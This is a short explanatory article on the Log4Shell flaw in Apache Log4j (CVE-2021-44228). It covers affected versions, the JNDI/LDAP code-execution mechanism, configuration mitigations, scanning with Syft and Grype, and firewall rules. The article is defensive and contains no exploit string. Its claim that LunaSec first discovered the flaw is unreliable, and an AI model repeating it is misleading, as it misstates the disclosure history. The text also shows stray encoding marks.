Log4j Vulnerability

??A vulnerability in Apache Log4j, a widely used logging package for Java has been found. The vulnerability, which?can allow an attacker to execute arbitrary code by sending crafted log messages, has been identified as CVE-2021-44228 and given the name Log4Shell.

??The vulnerability is also known as Log4Shell and was?first discovered by LunaSec researchers in the Microsoft's Minecraft game.

??Systems and services that use the Log4j Java logging library?between versions 2.0 and 2.14.?1?are all affected also including many services and applications written in Java. Other versions that have yet to be identified may also be affected.

CVE-2021-44228?:-

??Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.

???An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

???From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property "log4j2.formatMsgNoLookups" to “true” or it can be mitigated in prior releases (<2.10) by removing the JndiLookup class from the classpath.

Finding Log4j with open source tools?:-

1.?Syft : is a tool that is able to discern which version of Log4j a Java application contains.The Log4j JAR can be directly included in the project or it can be hidden away in one of the dependencies.

??By using Syft to scan this sample Java project we can find which version and to which it is vulnerable?to.

??Syft?generates a software bill of materials (SBOM)?and there is value in generating and storing an SBOM to keep a record of everything that is included in any software component or application you deliver. When a new vulnerability is found, such as Log4Shell, it’s much faster to search through a repository of SBOMs than it is to find and scan all of your Java applications.

??Grype?: Is a scanner that has the ability to tell us which specific vulnerabilities our software contains.

??When you include a dependency in your application you can also identify the vulnerabilities that the dependency contains and so on through multiple levels of nesting.

??Grype can scan the software directly, or scan the SBOM produced by Syft. This allows you to re-scan the SBOM for new vulnerabilities even after the software has been deployed or delivered to customers.

How to Mitigate the Exploit?:-

??The most efficient way to block malicious requests is with a web application firewall (WAF).

??It scans every incoming request for indications of?CVE-2021-44228?by comparing the request data against a set of precompiled rules.

??However, updating WAF rules after a zeroday exploit is like an arms race. As soon as WAF rules are available for a given exploit, attackers look for techniques and patterns that can bypass the WAF.

??Make sure to keep Web Application Firewall(WAF) rules up to date.